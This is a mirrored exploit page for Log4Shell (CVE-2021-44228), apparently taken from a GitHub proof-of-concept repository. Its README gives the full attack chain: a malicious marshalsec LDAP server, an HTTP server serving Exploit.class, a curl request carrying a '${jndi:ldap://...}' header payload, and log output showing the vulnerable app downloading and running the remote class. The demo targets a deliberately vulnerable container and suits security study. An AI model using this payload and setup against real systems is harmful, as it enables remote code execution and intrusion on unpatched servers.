Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
https://github.com/marcourbano/CVE-2021-44228
Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
PoC for CVE-2021-44228.
Readme
# Log4Shell POC (CVE-2021-44228)

The scope of this repository is to provide all the components needed to exploit CVE-2021-44228, nicknamed [Log4Shell](https://www.lunasec.io/docs/blog/log4j-zero-day/),   
and to show how to exploit it.

The ingredients needed to exploit this vulnerability are the following:
1. An **LDAP Server** that will redirect the vulnerable application to the exploit.
2. A **Vulnerable application** (Spring Boot web application vulnerable to CVE-2021-44228) using a vulnerable version of Log4J.
3. The Java **Exploit.class** (and the corresponding
Exploit.java file) that will be loaded by the Vulnerable application.
4. An **http server** from which the Vulnerable application will download the malicious Exploit.class

Credits:
- The **LDAP Server** has been pulled out from [mbechler](https://github.com/mbechler/marshalsec) Marshalsec repository.
- The **Vulnerable application** is the one provided by [christophetd](https://github.com/christophetd/log4shell-vulnerable-app).

Prerequisites:
- Maven
- Java
- Docker
- Python

## Running `LDAP Server` and `HTTP Server`
### `HTTP Server`
**1**. Move to `exploit` folder and spin up the http server by means of Python.
```
python3 -m http.server PORT
```
### `LDAP Server`
**1.** Move to `ldap_server` folder and build the `pom.xml`


```bash
mvn clean package -DskipTests
```

**2.** Move to `target` folder and spin up the server specifying `http_server_ip` and `http_server_port`

```
java -cp ldap_server-1.0-all.jar marshalsec.jndi.LDAPRefServer "http://http_server_ip:http_server_port/#Exploit"
```

*Note: this command runs the malicious ldap server by enforcing it to answer with the **Exploit.class** URI to every ldap query.*




## Running the `Vulnerable application`

Run the docker vulnerable application docker container

```
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
```

*Note: by default we're executing the vulnerable application on port 8080, feel free to change it.*

## Exploitation
Once the `vulnerable_application`, the `ldap_server` and the `http_server`
 are running, send a malicious http request to the vulnerable server.

```
curl VULNERABLE_APPLICATION_IP:8080 -H 'X-Api-Version: ${jndi:ldap://ldap_server_ip:1389/a}'
```

The `vulnerable_application` will log the payload and will perform an ldap query

```
2021-12-24 18:48:14.644  INFO 1 --- [nio-8080-exec-1] HelloWorld: Received a request for API version ${jndi:ldap://10.0.2.15:1389/a}
```

The `ldap_server` will answer with the Exploit.class URI

```
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.0.2.15:8443/Exploit.class
```

The `http_server` will receive a request to Exploit.class

```
Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...
172.17.0.2 - - [24/Dec/2021 19:48:14] "GET /Exploit.class HTTP/1.1" 200 -
```

Finally, we can check that the exploit created a new file on the victim filesystem. In this example we need to check the docker container filesystem.

![](./POC.png)

## References

https://www.lunasec.io/docs/blog/log4j-zero-day/   
https://github.com/mbechler/marshalsec   
 https://github.com/christophetd/log4shell-vulnerable-app

## Contributors
[@CrashOverflow](https://github.com/marcourbano)
File Snapshot

 [4.0K]  /data/pocs/d729ea8cb244b963ab527884436d37bdbe344676
├── [4.0K]  exploit
│   ├── [ 616]  Exploit.class
│   └── [ 588]  Exploit.java
├── [4.0K]  ldap_server
│   ├── [1.5K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [4.0K]  marshalsec
│                   └── [4.0K]  jndi
│                       └── [4.9K]  LDAPRefServer.java
├── [ 14K]  POC.png
└── [3.2K]  README.md

7 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →